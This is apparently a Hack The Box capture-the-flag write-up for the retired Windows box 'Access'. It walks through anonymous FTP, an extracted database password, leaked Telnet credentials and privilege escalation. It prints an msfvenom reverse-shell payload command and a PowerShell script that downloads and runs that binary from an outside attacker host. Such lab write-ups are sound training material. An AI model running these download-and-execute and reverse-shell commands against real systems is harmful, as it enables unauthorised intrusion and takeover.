For the uninitiated, Hack The Box is an online platform to practice and advance your expertise in penetration testing and cybersecurity (or showcase my own ineptitude). They offer both an unpaid and paid subscription with the unpaid service allowing access to the most 20 current boxes. You will discover when attempting to register for the platform that the real price of admission, however, is rather steep. There are ongoing competitions between universities, organizations, and countries along with an individual leaderboard. The write-up below is for a box named “Access” which is now retired.
We will begin at the beginning and continue until we come to the end; then type root.txt. Warning, the following write-up contains judicious use of PowerShell.
First, we need to enumerate. The nmap scan reveals that we are dealing with Microsoft Windows host which has several Microsoft services running such as File Transfer Protocol, Telnet, and Hypertext Transfer Protocol (IIS).
Telnet is accessible, but we don’t currently have a username or password. Ftp allows anonymous access with two folders visible, Backups and Engineer, which contain two files, backup.mdb and Access Control.zip. Let’s enable binary transfer mode on and download them.
Access Control.zip contains a .pst mailbox file but the file is password protected. Therefore, we need to focus our attention on the backup.mdb file. An Access database can be read in Linux using the mdb utilities, such as mdb-tables to read the tables and mdb-export the data contained in a table. There is an auth_user table which contains some interesting information, perhaps, the password for the .zip file:
We simply need to open the .pst file with Evolution. There is one message in the .pst which reveals the username and password to access Telnet.
Now, we have a foothold on the system. The next step will be to escalate our privilege and retrieve the root.txt file. We are mainly concerned with finding misconfigurations on the local system.
Several hours later…
There is one such misconfiguration on this host, found below. The Administrator account does not require a password which is likely stored on the host. We can leverage this misconfiguration to download and execute a malicious binary.
We can use msfvenom to construct our malicious binary which will unload a revere shell payload. This file will be placed in our link directory and downloaded to the host using a PowerShell script.
msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=10.10.15.1 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -f exe -o /var/www/html/file.exe
However, we don’t have access to any application that can download files, including bitsadmin. What we can do is pipe our script into a file using echo. Note, this is may not be the most elegant method to solve this particular problem. The PowerShell command will run our script and download the malicious binary that we created.
echo $storageDir = $pwd > wget.ps1 echo $webclient = New-Object System.Net.WebClient >>wget.ps1 echo $url = "http://10.10.15.1/file.exe" >> wget.ps1 echo $file = "file.exe" >> wget.ps1 echo $webclient.DownloadFile($url,$file) >> wget.ps1 C:\Users\security>powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1
Finally, we will set up Metasploit to receive our incoming reverse shell from the host. Then, run our malicious binary file.exe from the command line.
At this point, we have complete control of the system and type the root.txt file to the console. The root.txt file contains proof that we have control of the host. You may feel compelled to dance at this point. There are many styles to the “root dance” but most importantly, find your own style and own it.